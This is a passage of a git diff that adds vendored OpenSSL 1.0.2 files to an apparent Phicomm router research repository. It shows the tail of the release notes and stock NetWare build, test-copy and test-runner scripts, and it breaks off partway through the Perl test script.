+      o Add support for OS/390 Unix, UnixWare with gcc, OpenUNIX 8,
+        MIPS Linux; shared library support for Irix, HP-UX.
+      o Add crypto accelerator support for AEP, Baltimore SureWare,
+        Broadcom and Cryptographic Appliance's keyserver
+        [in 0.9.6c-engine release].
+
+  Major changes between OpenSSL 0.9.6a and OpenSSL 0.9.6b [9 Jul 2001]:
+
+      o Security fix: PRNG improvements.
+      o Security fix: RSA OAEP check.
+      o Security fix: Reinsert and fix countermeasure to Bleichbacher's
+        attack.
+      o MIPS bug fix in BIGNUM.
+      o Bug fix in "openssl enc".
+      o Bug fix in X.509 printing routine.
+      o Bug fix in DSA verification routine and DSA S/MIME verification.
+      o Bug fix to make PRNG thread-safe.
+      o Bug fix in RAND_file_name().
+      o Bug fix in compatibility mode trust settings.
+      o Bug fix in blowfish EVP.
+      o Increase default size for BIO buffering filter.
+      o Compatibility fixes in some scripts.
+
+  Major changes between OpenSSL 0.9.6 and OpenSSL 0.9.6a [5 Apr 2001]:
+
+      o Security fix: change behavior of OpenSSL to avoid using
+        environment variables when running as root.
+      o Security fix: check the result of RSA-CRT to reduce the
+        possibility of deducing the private key from an incorrectly
+        calculated signature.
+      o Security fix: prevent Bleichenbacher's DSA attack.
+      o Security fix: Zero the premaster secret after deriving the
+        master secret in DH ciphersuites.
+      o Reimplement SSL_peek(), which had various problems.
+      o Compatibility fix: the function des_encrypt() renamed to
+        des_encrypt1() to avoid clashes with some Unixen libc.
+      o Bug fixes for Win32, HP/UX and Irix.
+      o Bug fixes in BIGNUM, SSL, PKCS#7, PKCS#12, X.509, CONF and
+        memory checking routines.
+      o Bug fixes for RSA operations in threaded environments.
+      o Bug fixes in misc. openssl applications.
+      o Remove a few potential memory leaks.
+      o Add tighter checks of BIGNUM routines.
+      o Shared library support has been reworked for generality.
+      o More documentation.
+      o New function BN_rand_range().
+      o Add "-rand" option to openssl s_client and s_server.
+
+  Major changes between OpenSSL 0.9.5a and OpenSSL 0.9.6 [10 Oct 2000]:
+
+      o Some documentation for BIO and SSL libraries.
+      o Enhanced chain verification using key identifiers.
+      o New sign and verify options to 'dgst' application.
+      o Support for DER and PEM encoded messages in 'smime' application.
+      o New 'rsautl' application, low level RSA utility.
+      o MD4 now included.
+      o Bugfix for SSL rollback padding check.
+      o Support for external crypto devices [1].
+      o Enhanced EVP interface.
+
+    [1] The support for external crypto devices is currently a separate
+        distribution.  See the file README.ENGINE.
+
+  Major changes between OpenSSL 0.9.5 and OpenSSL 0.9.5a [1 Apr 2000]:
+
+      o Bug fixes for Win32, SuSE Linux, NeXTSTEP and FreeBSD 2.2.8 
+      o Shared library support for HPUX and Solaris-gcc
+      o Support of Linux/IA64
+      o Assembler support for Mingw32
+      o New 'rand' application
+      o New way to check for existence of algorithms from scripts
+
+  Major changes between OpenSSL 0.9.4 and OpenSSL 0.9.5 [25 May 2000]:
+
+      o S/MIME support in new 'smime' command
+      o Documentation for the OpenSSL command line application
+      o Automation of 'req' application
+      o Fixes to make s_client, s_server work under Windows
+      o Support for multiple fieldnames in SPKACs
+      o New SPKAC command line utilty and associated library functions
+      o Options to allow passwords to be obtained from various sources
+      o New public key PEM format and options to handle it
+      o Many other fixes and enhancements to command line utilities
+      o Usable certificate chain verification
+      o Certificate purpose checking
+      o Certificate trust settings
+      o Support of authority information access extension
+      o Extensions in certificate requests
+      o Simplified X509 name and attribute routines
+      o Initial (incomplete) support for international character sets
+      o New DH_METHOD, DSA_METHOD and enhanced RSA_METHOD
+      o Read only memory BIOs and simplified creation function
+      o TLS/SSL protocol bugfixes: Accept TLS 'client hello' in SSL 3.0
+        record; allow fragmentation and interleaving of handshake and other
+        data
+      o TLS/SSL code now "tolerates" MS SGC
+      o Work around for Netscape client certificate hang bug
+      o RSA_NULL option that removes RSA patent code but keeps other
+        RSA functionality
+      o Memory leak detection now allows applications to add extra information
+        via a per-thread stack
+      o PRNG robustness improved
+      o EGD support
+      o BIGNUM library bug fixes
+      o Faster DSA parameter generation
+      o Enhanced support for Alpha Linux
+      o Experimental MacOS support
+
+  Major changes between OpenSSL 0.9.3 and OpenSSL 0.9.4 [9 Aug 1999]:
+
+      o Transparent support for PKCS#8 format private keys: these are used
+        by several software packages and are more secure than the standard
+        form
+      o PKCS#5 v2.0 implementation
+      o Password callbacks have a new void * argument for application data
+      o Avoid various memory leaks
+      o New pipe-like BIO that allows using the SSL library when actual I/O
+        must be handled by the application (BIO pair)
+
+  Major changes between OpenSSL 0.9.2b and OpenSSL 0.9.3 [24 May 1999]:
+      o Lots of enhancements and cleanups to the Configuration mechanism
+      o RSA OEAP related fixes
+      o Added `openssl ca -revoke' option for revoking a certificate
+      o Source cleanups: const correctness, type-safe stacks and ASN.1 SETs
+      o Source tree cleanups: removed lots of obsolete files
+      o Thawte SXNet, certificate policies and CRL distribution points
+        extension support
+      o Preliminary (experimental) S/MIME support
+      o Support for ASN.1 UTF8String and VisibleString
+      o Full integration of PKCS#12 code
+      o Sparc assembler bignum implementation, optimized hash functions
+      o Option to disable selected ciphers
+
+  Major changes between OpenSSL 0.9.1c and OpenSSL 0.9.2b [22 Mar 1999]:
+      o Fixed a security hole related to session resumption
+      o Fixed RSA encryption routines for the p < q case
+      o "ALL" in cipher lists now means "everything except NULL ciphers"
+      o Support for Triple-DES CBCM cipher
+      o Support of Optimal Asymmetric Encryption Padding (OAEP) for RSA
+      o First support for new TLSv1 ciphers
+      o Added a few new BIOs (syslog BIO, reliable BIO)
+      o Extended support for DSA certificate/keys.
+      o Extended support for Certificate Signing Requests (CSR)
+      o Initial support for X.509v3 extensions
+      o Extended support for compression inside the SSL record layer
+      o Overhauled Win32 builds
+      o Cleanups and fixes to the Big Number (BN) library
+      o Support for ASN.1 GeneralizedTime
+      o Splitted ASN.1 SETs from SEQUENCEs
+      o ASN1 and PEM support for Netscape Certificate Sequences
+      o Overhauled Perl interface
+      o Lots of source tree cleanups.
+      o Lots of memory leak fixes.
+      o Lots of bug fixes.
+
+  Major changes between SSLeay 0.9.0b and OpenSSL 0.9.1c [23 Dec 1998]:
+      o Integration of the popular NO_RSA/NO_DSA patches
+      o Initial support for compression inside the SSL record layer
+      o Added BIO proxy and filtering functionality
+      o Extended Big Number (BN) library
+      o Added RIPE MD160 message digest
+      o Addeed support for RC2/64bit cipher
+      o Extended ASN.1 parser routines
+      o Adjustations of the source tree for CVS
+      o Support for various new platforms
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Netware/build.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Netware/build.bat
new file mode 100644
index 0000000..3125c2a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Netware/build.bat
@@ -0,0 +1,235 @@
+@echo off
+
+rem ========================================================================
+rem   Batch file to automate building OpenSSL for NetWare.
+rem
+rem   usage:
+rem      build [target] [debug opts] [assembly opts] [configure opts]
+rem
+rem      target        - "netware-clib" - CLib NetWare build (WinSock Sockets)
+rem                    - "netware-clib-bsdsock" - CLib NetWare build (BSD Sockets)
+rem                    - "netware-libc" - LibC NetWare build (WinSock Sockets)
+rem                    - "netware-libc-bsdsock" - LibC NetWare build (BSD Sockets)
+rem 
+rem      debug opts    - "debug"  - build debug
+rem
+rem      assembly opts - "nw-mwasm" - use Metrowerks assembler
+rem                    - "nw-nasm"  - use NASM assembler
+rem                    - "no-asm"   - don't use assembly
+rem
+rem      configure opts- all unrecognized arguments are passed to the
+rem                       perl configure script
+rem
+rem   If no arguments are specified the default is to build non-debug with
+rem   no assembly.  NOTE: there is no default BLD_TARGET.
+rem
+
+
+
+rem   No assembly is the default - Uncomment section below to change
+rem   the assembler default
+set ASM_MODE=
+set ASSEMBLER=
+set NO_ASM=no-asm
+
+rem   Uncomment to default to the Metrowerks assembler
+rem set ASM_MODE=nw-mwasm
+rem set ASSEMBLER=Metrowerks
+rem set NO_ASM=
+
+rem   Uncomment to default to the NASM assembler
+rem set ASM_MODE=nw-nasm
+rem set ASSEMBLER=NASM
+rem set NO_ASM=
+
+rem   No default Bld target
+set BLD_TARGET=no_target
+rem set BLD_TARGET=netware-clib
+rem set BLD_TARGET=netware-libc
+
+
+rem   Default to build non-debug
+set DEBUG=
+                                    
+rem   Uncomment to default to debug build
+rem set DEBUG=debug
+
+
+set CONFIG_OPTS=
+set ARG_PROCESSED=NO
+
+
+rem   Process command line args
+:opts
+if "a%1" == "a" goto endopt
+if "%1" == "no-asm"   set NO_ASM=no-asm
+if "%1" == "no-asm"   set ARG_PROCESSED=YES
+if "%1" == "debug"    set DEBUG=debug
+if "%1" == "debug"    set ARG_PROCESSED=YES
+if "%1" == "nw-nasm"  set ASM_MODE=nw-nasm
+if "%1" == "nw-nasm"  set ASSEMBLER=NASM
+if "%1" == "nw-nasm"  set NO_ASM=
+if "%1" == "nw-nasm"  set ARG_PROCESSED=YES
+if "%1" == "nw-mwasm" set ASM_MODE=nw-mwasm
+if "%1" == "nw-mwasm" set ASSEMBLER=Metrowerks
+if "%1" == "nw-mwasm" set NO_ASM=
+if "%1" == "nw-mwasm" set ARG_PROCESSED=YES
+if "%1" == "netware-clib" set BLD_TARGET=netware-clib
+if "%1" == "netware-clib" set ARG_PROCESSED=YES
+if "%1" == "netware-clib-bsdsock" set BLD_TARGET=netware-clib-bsdsock
+if "%1" == "netware-clib-bsdsock" set ARG_PROCESSED=YES
+if "%1" == "netware-libc" set BLD_TARGET=netware-libc
+if "%1" == "netware-libc" set ARG_PROCESSED=YES
+if "%1" == "netware-libc-bsdsock" set BLD_TARGET=netware-libc-bsdsock
+if "%1" == "netware-libc-bsdsock" set ARG_PROCESSED=YES
+
+rem   If we didn't recognize the argument, consider it an option for config
+if "%ARG_PROCESSED%" == "NO" set CONFIG_OPTS=%CONFIG_OPTS% %1
+if "%ARG_PROCESSED%" == "YES" set ARG_PROCESSED=NO
+
+shift
+goto opts
+:endopt
+
+rem make sure a valid BLD_TARGET was specified
+if "%BLD_TARGET%" == "no_target" goto no_target
+
+rem build the nlm make file name which includes target and debug info
+set NLM_MAKE=
+if "%BLD_TARGET%" == "netware-clib" set NLM_MAKE=netware\nlm_clib
+if "%BLD_TARGET%" == "netware-clib-bsdsock" set NLM_MAKE=netware\nlm_clib_bsdsock
+if "%BLD_TARGET%" == "netware-libc" set NLM_MAKE=netware\nlm_libc
+if "%BLD_TARGET%" == "netware-libc-bsdsock" set NLM_MAKE=netware\nlm_libc_bsdsock
+if "%DEBUG%" == "" set NLM_MAKE=%NLM_MAKE%.mak
+if "%DEBUG%" == "debug" set NLM_MAKE=%NLM_MAKE%_dbg.mak
+
+if "%NO_ASM%" == "no-asm" set ASM_MODE=
+if "%NO_ASM%" == "no-asm" set ASSEMBLER=
+if "%NO_ASM%" == "no-asm" set CONFIG_OPTS=%CONFIG_OPTS% no-asm
+if "%NO_ASM%" == "no-asm" goto do_config
+
+
+rem ==================================================
+echo Generating x86 for %ASSEMBLER% assembler
+
+echo Bignum
+cd crypto\bn\asm
+rem perl x86.pl %ASM_MODE% > bn-nw.asm
+perl bn-586.pl %ASM_MODE% > bn-nw.asm
+perl co-586.pl %ASM_MODE% > co-nw.asm
+cd ..\..\..
+
+echo AES
+cd crypto\aes\asm
+perl aes-586.pl %ASM_MODE% > a-nw.asm
+cd ..\..\..
+
+echo DES
+cd crypto\des\asm
+perl des-586.pl %ASM_MODE% > d-nw.asm
+cd ..\..\..
+
+echo "crypt(3)"
+
+cd crypto\des\asm
+perl crypt586.pl %ASM_MODE% > y-nw.asm
+cd ..\..\..
+
+echo Blowfish
+
+cd crypto\bf\asm
+perl bf-586.pl %ASM_MODE% > b-nw.asm
+cd ..\..\..
+
+echo CAST5
+cd crypto\cast\asm
+perl cast-586.pl %ASM_MODE% > c-nw.asm
+cd ..\..\..
+
+echo RC4
+cd crypto\rc4\asm
+perl rc4-586.pl %ASM_MODE% > r4-nw.asm
+cd ..\..\..
+
+echo MD5
+cd crypto\md5\asm
+perl md5-586.pl %ASM_MODE% > m5-nw.asm
+cd ..\..\..
+
+echo SHA1
+cd crypto\sha\asm
+perl sha1-586.pl %ASM_MODE% > s1-nw.asm
+perl sha256-586.pl %ASM_MODE% > sha256-nw.asm
+perl sha512-586.pl %ASM_MODE% > sha512-nw.asm
+cd ..\..\..
+
+echo RIPEMD160
+cd crypto\ripemd\asm
+perl rmd-586.pl %ASM_MODE% > rm-nw.asm
+cd ..\..\..
+
+echo RC5\32
+cd crypto\rc5\asm
+perl rc5-586.pl %ASM_MODE% > r5-nw.asm
+cd ..\..\..
+
+echo WHIRLPOOL
+cd crypto\whrlpool\asm
+perl wp-mmx.pl %ASM_MODE% > wp-nw.asm
+cd ..\..\..
+
+echo CPUID
+cd crypto
+perl x86cpuid.pl %ASM_MODE% > x86cpuid-nw.asm
+cd ..\
+
+rem ===============================================================
+rem
+:do_config
+
+echo .
+echo configure options: %CONFIG_OPTS% %BLD_TARGET%
+echo .
+perl configure %CONFIG_OPTS% %BLD_TARGET%
+
+perl util\mkfiles.pl >MINFO
+
+echo .
+echo mk1mf.pl options: %DEBUG% %ASM_MODE% %CONFIG_OPTS% %BLD_TARGET%
+echo .
+perl util\mk1mf.pl %DEBUG% %ASM_MODE% %CONFIG_OPTS% %BLD_TARGET% >%NLM_MAKE%
+
+make -f %NLM_MAKE% vclean
+echo .
+echo The makefile "%NLM_MAKE%" has been created use your maketool to
+echo build (ex: make -f %NLM_MAKE%)
+goto end
+
+rem ===============================================================
+rem
+:no_target
+echo .
+echo .  No build target specified!!!
+echo .
+echo .  usage: build [target] [debug opts] [assembly opts] [configure opts]
+echo .
+echo .     target        - "netware-clib" - CLib NetWare build (WinSock Sockets)
+echo .                   - "netware-clib-bsdsock" - CLib NetWare build (BSD Sockets)
+echo .                   - "netware-libc" - LibC NetWare build (WinSock Sockets)
+echo .                   - "netware-libc-bsdsock" - LibC NetWare build (BSD Sockets)
+echo .
+echo .     debug opts    - "debug"  - build debug
+echo .
+echo .     assembly opts - "nw-mwasm" - use Metrowerks assembler
+echo .                     "nw-nasm"  - use NASM assembler
+echo .                     "no-asm"   - don't use assembly
+echo .
+echo .     configure opts- all unrecognized arguments are passed to the
+echo .                      perl configure script
+echo .
+echo .  If no debug or assembly opts are specified the default is to build
+echo .  non-debug without assembly
+echo .
+
+        
+:end        
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Netware/cpy_tests.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Netware/cpy_tests.bat
new file mode 100644
index 0000000..1583f28
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Netware/cpy_tests.bat
@@ -0,0 +1,113 @@
+@echo off
+
+rem   Batch file to copy OpenSSL stuff to a NetWare server for testing
+
+rem   This batch file will create an "opensssl" directory at the root of the
+rem   specified NetWare drive and copy the required files to run the tests.
+rem   It should be run from inside the "openssl\netware" subdirectory.
+
+rem   Usage:
+rem      cpy_tests.bat <test subdirectory> <NetWare drive>
+rem          <test subdirectory> - out_nw.dbg | out_nw
+rem          <NetWare drive> - any mapped drive letter
+rem
+rem      example ( copy from debug build to m: dirve ):
+rem              cpy_tests.bat out_nw.dbg m:
+rem
+rem      CAUTION:  If a directory named OpenSSL exists on the target drive
+rem                it will be deleted first.
+
+
+if "%1" == "" goto usage
+if "%2" == "" goto usage
+
+rem   Assume running in \openssl directory unless cpy_tests.bat exists then
+rem   it must be the \openssl\netware directory
+set loc=.
+if exist cpy_tests.bat set loc=..
+
+rem   make sure the local build subdirectory specified is valid
+if not exist %loc%\%1\NUL goto invalid_dir
+
+rem   make sure target drive is valid
+if not exist %2\NUL goto invalid_drive
+
+rem   If an OpenSSL directory exists on the target drive, remove it
+if exist %2\openssl\NUL goto remove_openssl
+goto do_copy
+
+:remove_openssl
+echo .
+echo OpenSSL directory exists on %2 - it will be removed!
+pause
+rmdir %2\openssl /s /q
+
+:do_copy
+rem   make an "openssl" directory and others at the root of the NetWare drive
+mkdir %2\openssl
+mkdir %2\openssl\test_out
+mkdir %2\openssl\apps
+mkdir %2\openssl\certs
+mkdir %2\openssl\test
+
+
+rem   copy the test nlms
+copy %loc%\%1\*.nlm %2\openssl\
+
+rem   copy the test perl script
+copy %loc%\netware\do_tests.pl %2\openssl\
+
+rem   copy the certs directory stuff
+xcopy %loc%\certs\*.*         %2\openssl\certs\ /s
+
+rem   copy the test directory stuff
+copy %loc%\test\CAss.cnf      %2\openssl\test\
+copy %loc%\test\Uss.cnf       %2\openssl\test\
+copy %loc%\test\pkcs7.pem     %2\openssl\test\
+copy %loc%\test\pkcs7-1.pem   %2\openssl\test\
+copy %loc%\test\testcrl.pem   %2\openssl\test\
+copy %loc%\test\testp7.pem    %2\openssl\test\
+copy %loc%\test\testreq2.pem  %2\openssl\test\
+copy %loc%\test\testrsa.pem   %2\openssl\test\
+copy %loc%\test\testsid.pem   %2\openssl\test\
+copy %loc%\test\testx509.pem  %2\openssl\test\
+copy %loc%\test\v3-cert1.pem  %2\openssl\test\
+copy %loc%\test\v3-cert2.pem  %2\openssl\test\
+copy %loc%\crypto\evp\evptests.txt %2\openssl\test\
+
+rem   copy the apps directory stuff
+copy %loc%\apps\client.pem    %2\openssl\apps\
+copy %loc%\apps\server.pem    %2\openssl\apps\
+copy %loc%\apps\openssl.cnf   %2\openssl\apps\
+
+echo .
+echo Tests copied
+echo Run the test script at the console by typing:
+echo     "Perl \openssl\do_tests.pl"
+echo .
+echo Make sure the Search path includes the OpenSSL subdirectory
+
+goto end
+
+:invalid_dir
+echo.
+echo Invalid build directory specified: %1
+echo.
+goto usage
+
+:invalid_drive
+echo.
+echo Invalid drive: %2
+echo.
+goto usage
+
+:usage
+echo.
+echo usage: cpy_tests.bat [test subdirectory] [NetWare drive]
+echo     [test subdirectory] - out_nw_clib.dbg, out_nw_libc.dbg, etc. 
+echo     [NetWare drive]     - any mapped drive letter
+echo.
+echo example: cpy_test out_nw_clib.dbg M:
+echo  (copy from clib debug build area to M: drive)
+
+:end
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Netware/do_tests.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Netware/do_tests.pl
new file mode 100644
index 0000000..ac482db
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Netware/do_tests.pl
@@ -0,0 +1,624 @@
+# perl script to run OpenSSL tests
+
+
+my $base_path      = "\\openssl";
+
+my $output_path    = "$base_path\\test_out";
+my $cert_path      = "$base_path\\certs";
+my $test_path      = "$base_path\\test";
+my $app_path       = "$base_path\\apps";
+
+my $tmp_cert       = "$output_path\\cert.tmp";
+my $OpenSSL_config = "$app_path\\openssl.cnf";
+my $log_file       = "$output_path\\tests.log";
+
+my $pause = 0;
+
+
+#  process the command line args to see if they wanted us to pause
+#  between executing each command
+foreach $i (@ARGV)
+{
+   if ($i =~ /^-p$/)
+   { $pause=1; }
+}
+
+
+
+main();
+
+
+############################################################################
+sub main()
+{
+   # delete all the output files in the output directory
+   unlink <$output_path\\*.*>;
+
+   # open the main log file
+   open(OUT, ">$log_file") || die "unable to open $log_file\n";
+
+   print( OUT "========================================================\n");
+   my $outFile = "$output_path\\version.out";
+   system("openssl2 version (CLIB_OPT)/>$outFile");
+   log_output("CHECKING FOR OPENSSL VERSION:", $outFile);
+
+   algorithm_tests();
+   encryption_tests();
+   evp_tests();
+   pem_tests();
+   verify_tests();
+   ca_tests();
+   ssl_tests();
+
+   close(OUT);
+
+   print("\nCompleted running tests.\n\n");
+   print("Check log file for errors: $log_file\n");
+}
+
+############################################################################
+sub algorithm_tests
+{
+   my $i;
+   my $outFile;
+   my @tests = ( rsa_test, destest, ideatest, bftest, bntest, shatest, sha1test,
+                 sha256t, sha512t, dsatest, md2test, md4test, md5test, mdc2test,
+                 rc2test, rc4test, rc5test, randtest, rmdtest, dhtest, ecdhtest,
+                 ecdsatest, ectest, exptest, casttest, hmactest );
+
+   print( "\nRUNNING CRYPTO ALGORITHM TESTS:\n\n");
+
+   print( OUT "\n========================================================\n");
+   print( OUT "CRYPTO ALGORITHM TESTS:\n\n");
+
+   foreach $i (@tests)
+   {
+      if (-e "$base_path\\$i.nlm")
+      {
+         $outFile = "$output_path\\$i.out";
+         system("$i (CLIB_OPT)/>$outFile");
+         log_desc("Test: $i\.nlm:");
+         log_output("", $outFile );
+      }
+      else
+      {
+         log_desc("Test: $i\.nlm: file not found");
+      }
+   }
+}
+
+############################################################################
+sub encryption_tests
+{
+   my $i;
+   my $outFile;
+   my @enc_tests = ( "enc", "rc4", "des-cfb", "des-ede-cfb", "des-ede3-cfb",
+                     "des-ofb", "des-ede-ofb", "des-ede3-ofb",
+                     "des-ecb", "des-ede", "des-ede3", "des-cbc",
+                     "des-ede-cbc", "des-ede3-cbc", "idea-ecb", "idea-cfb",
+                     "idea-ofb", "idea-cbc", "rc2-ecb", "rc2-cfb",
+                     "rc2-ofb", "rc2-cbc", "bf-ecb", "bf-cfb",
+                     "bf-ofb", "bf-cbc" );
+
+   my $input = "$base_path\\do_tests.pl";
+   my $cipher = "$output_path\\cipher.out";
+   my $clear = "$output_path\\clear.out";
+
+   print( "\nRUNNING ENCRYPTION & DECRYPTION TESTS:\n\n");
+
+   print( OUT "\n========================================================\n");
+   print( OUT "FILE ENCRYPTION & DECRYPTION TESTS:\n\n");
+
+   foreach $i (@enc_tests)
+   {
+      log_desc("Testing: $i");
+
+      # do encryption
+      $outFile = "$output_path\\enc.out";
+      system("openssl2 $i -e -bufsize 113 -k test -in $input -out $cipher (CLIB_OPT)/>$outFile" );
+      log_output("Encrypting: $input --> $cipher", $outFile);
+
+      # do decryption
+      $outFile = "$output_path\\dec.out";
+      system("openssl2 $i -d -bufsize 157 -k test -in $cipher -out $clear (CLIB_OPT)/>$outFile");
+      log_output("Decrypting: $cipher --> $clear", $outFile);
+
+      # compare files
+      $x = compare_files( $input, $clear, 1);
+      if ( $x == 0 )
+      {
+         print( "\rSUCCESS - files match: $input, $clear\n");
+         print( OUT "SUCCESS - files match: $input, $clear\n");
+      }
+      else
+      {
+         print( "\rERROR: files don't match\n");
+         print( OUT "ERROR: files don't match\n");
+      }
+
+      do_wait();
+
+      # Now do the same encryption but use Base64
+
+      # do encryption B64
+      $outFile = "$output_path\\B64enc.out";
+      system("openssl2 $i -a -e -bufsize 113 -k test -in $input -out $cipher (CLIB_OPT)/>$outFile");
+      log_output("Encrypting(B64): $cipher --> $clear", $outFile);
+
+      # do decryption B64
+      $outFile = "$output_path\\B64dec.out";
+      system("openssl2 $i -a -d -bufsize 157 -k test -in $cipher -out $clear (CLIB_OPT)/>$outFile");
+      log_output("Decrypting(B64): $cipher --> $clear", $outFile);
+
+      # compare files
+      $x = compare_files( $input, $clear, 1);
+      if ( $x == 0 )
+      {
+         print( "\rSUCCESS - files match: $input, $clear\n");
+         print( OUT "SUCCESS - files match: $input, $clear\n");
+      }
+      else
+      {
+         print( "\rERROR: files don't match\n");
+         print( OUT "ERROR: files don't match\n");
+      }
+
+      do_wait();
+
+   } # end foreach
+
+   # delete the temporary files
+   unlink($cipher);
+   unlink($clear);
+}
+
+
+############################################################################
+sub pem_tests
+{
+   my $i;
+   my $tmp_out;
+   my $outFile = "$output_path\\pem.out";
+
+   my %pem_tests = (
+         "crl"      => "testcrl.pem",
+          "pkcs7"   => "testp7.pem",
+          "req"     => "testreq2.pem",
+          "rsa"     => "testrsa.pem",
+          "x509"    => "testx509.pem",
+          "x509"    => "v3-cert1.pem",
+          "sess_id" => "testsid.pem"  );
+
+
+   print( "\nRUNNING PEM TESTS:\n\n");
+
+   print( OUT "\n========================================================\n");
+   print( OUT "PEM TESTS:\n\n");
+
+   foreach $i (keys(%pem_tests))
+   {
+      log_desc( "Testing: $i");
+
+      my $input = "$test_path\\$pem_tests{$i}";
+
+      $tmp_out = "$output_path\\$pem_tests{$i}";
+
+      if ($i ne "req" )
+      {
+         system("openssl2 $i -in $input -out $tmp_out (CLIB_OPT)/>$outFile");
+         log_output( "openssl2 $i -in $input -out $tmp_out", $outFile);
+      }
+      else
+      {
+         system("openssl2 $i -in $input -out $tmp_out -config $OpenSSL_config (CLIB_OPT)/>$outFile");
+         log_output( "openssl2 $i -in $input -out $tmp_out -config $OpenSSL_config", $outFile );
+      }
+
+      $x = compare_files( $input, $tmp_out);
+      if ( $x == 0 )
+      {
+         print( "\rSUCCESS - files match: $input, $tmp_out\n");
+         print( OUT "SUCCESS - files match: $input, $tmp_out\n");
+      }
+      else
+      {
+         print( "\rERROR: files don't match\n");
+         print( OUT "ERROR: files don't match\n");
+      }
+      do_wait();
+
+   } # end foreach
+}
+
+
+############################################################################
+sub verify_tests
+{
+   my $i;
+   my $outFile = "$output_path\\verify.out";
+
+   $cert_path =~ s/\\/\//g;
+   my @cert_files = <$cert_path/*.pem>;
+
+   print( "\nRUNNING VERIFY TESTS:\n\n");
+
+   print( OUT "\n========================================================\n");
+   print( OUT "VERIFY TESTS:\n\n");
+
+   make_tmp_cert_file();
+
+   foreach $i (@cert_files)
+   {
+      system("openssl2 verify -CAfile $tmp_cert $i (CLIB_OPT)/>$outFile");
+      log_desc("Verifying cert: $i");
+      log_output("openssl2 verify -CAfile $tmp_cert $i", $outFile);
+   }
+}
+
+
+############################################################################
+sub ssl_tests
+{
+   my $outFile = "$output_path\\ssl_tst.out";
+   my($CAcert) = "$output_path\\certCA.ss";
+   my($Ukey)   = "$output_path\\keyU.ss";
+   my($Ucert)  = "$output_path\\certU.ss";
+   my($ssltest)= "ssltest -key $Ukey -cert $Ucert -c_key $Ukey -c_cert $Ucert -CAfile $CAcert";
+
+   print( "\nRUNNING SSL TESTS:\n\n");
+
+   print( OUT "\n========================================================\n");
+   print( OUT "SSL TESTS:\n\n");
+
+   system("ssltest -ssl2 (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv2:");
+   log_output("ssltest -ssl2", $outFile);
+
+   system("$ssltest -ssl2 -server_auth (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv2 with server authentication:");
+   log_output("$ssltest -ssl2 -server_auth", $outFile);
+
+   system("$ssltest -ssl2 -client_auth (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv2 with client authentication:");
+   log_output("$ssltest -ssl2 -client_auth", $outFile);
+
+   system("$ssltest -ssl2 -server_auth -client_auth (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv2 with both client and server authentication:");
+   log_output("$ssltest -ssl2 -server_auth -client_auth", $outFile);
+
+   system("ssltest -ssl3 (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv3:");
+   log_output("ssltest -ssl3", $outFile);
+
+   system("$ssltest -ssl3 -server_auth (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv3 with server authentication:");
+   log_output("$ssltest -ssl3 -server_auth", $outFile);
+
+   system("$ssltest -ssl3 -client_auth (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv3 with client authentication:");
+   log_output("$ssltest -ssl3 -client_auth", $outFile);
+
+   system("$ssltest -ssl3 -server_auth -client_auth (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv3 with both client and server authentication:");
+   log_output("$ssltest -ssl3 -server_auth -client_auth", $outFile);
+
+   system("ssltest (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv2/sslv3:");
+   log_output("ssltest", $outFile);
+
+   system("$ssltest -server_auth (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv2/sslv3 with server authentication:");
+   log_output("$ssltest -server_auth", $outFile);
+
+   system("$ssltest -client_auth (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv2/sslv3 with client authentication:");
+   log_output("$ssltest -client_auth ", $outFile);
+
+   system("$ssltest -server_auth -client_auth (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv2/sslv3 with both client and server authentication:");
+   log_output("$ssltest -server_auth -client_auth", $outFile);
+
+   system("ssltest -bio_pair -ssl2 (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv2 via BIO pair:");
+   log_output("ssltest -bio_pair -ssl2", $outFile);
+
+   system("ssltest -bio_pair -dhe1024dsa -v (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv2/sslv3 with 1024 bit DHE via BIO pair:");
+   log_output("ssltest -bio_pair -dhe1024dsa -v", $outFile);
+
+   system("$ssltest -bio_pair -ssl2 -server_auth (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv2 with server authentication via BIO pair:");
+   log_output("$ssltest -bio_pair -ssl2 -server_auth", $outFile);
+
+   system("$ssltest -bio_pair -ssl2 -client_auth (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv2 with client authentication via BIO pair:");
+   log_output("$ssltest -bio_pair -ssl2 -client_auth", $outFile);
+
+   system("$ssltest -bio_pair -ssl2 -server_auth -client_auth (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv2 with both client and server authentication via BIO pair:");
+   log_output("$ssltest -bio_pair -ssl2 -server_auth -client_auth", $outFile);
+
+   system("ssltest -bio_pair -ssl3 (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv3 via BIO pair:");
+   log_output("ssltest -bio_pair -ssl3", $outFile);
+
+   system("$ssltest -bio_pair -ssl3 -server_auth (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv3 with server authentication via BIO pair:");
+   log_output("$ssltest -bio_pair -ssl3 -server_auth", $outFile);
+
+   system("$ssltest -bio_pair -ssl3 -client_auth (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv3 with client authentication  via BIO pair:");
+   log_output("$ssltest -bio_pair -ssl3 -client_auth", $outFile);
+
